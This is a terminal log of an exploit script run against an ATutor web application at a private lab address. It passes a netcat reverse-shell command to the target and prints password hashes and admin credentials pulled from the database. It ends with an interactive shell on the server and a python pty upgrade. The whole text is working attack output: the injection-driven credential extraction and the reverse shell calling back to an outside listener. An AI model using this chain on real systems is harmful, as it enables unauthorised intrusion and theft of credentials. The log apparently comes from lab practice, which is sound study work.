$ python3 poc3.py 10.0.2.5 'nc -nv -e /bin/bash 10.0.2.15 4444'
(+) Listening for connection....
listening on [any] 4444 ...
(+) Retrieving database version length....
10
(+) Retrieving database version....
5.6.20-log
(+) Retrieving username length....
6
(+) Retrieving username....
atutor
(+) Retrieving password hash length....
40
(+) Retrieving password hash....
4b863fcf722bd871226ec1207b77424c5a5ebbc8
(+) Retrieving admin username length....
20
(+) Retrieving admin username....
atutor_administrator
(+) Retrieving admin password hash length....
40
(+) Retrieving admin password hash....
4b863fcf722bd871226ec1207b77424c5a5ebbc8
(+) Checking if the database user has SUPER privilege....
Yes
(+) Spawning a shell....
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.5] 40684
which python3
/bin/python3
python3 -c 'import pty; pty.spawn("/bin/bash")'
bash: /root/.bashrc: Permission denied
bash-4.4$ whoami
whoami
daemon
bash-4.4$ pwd
pwd
/opt/lampp/htdocs/ATutor/content/import/1
bash-4.4$ exit
exit
exit
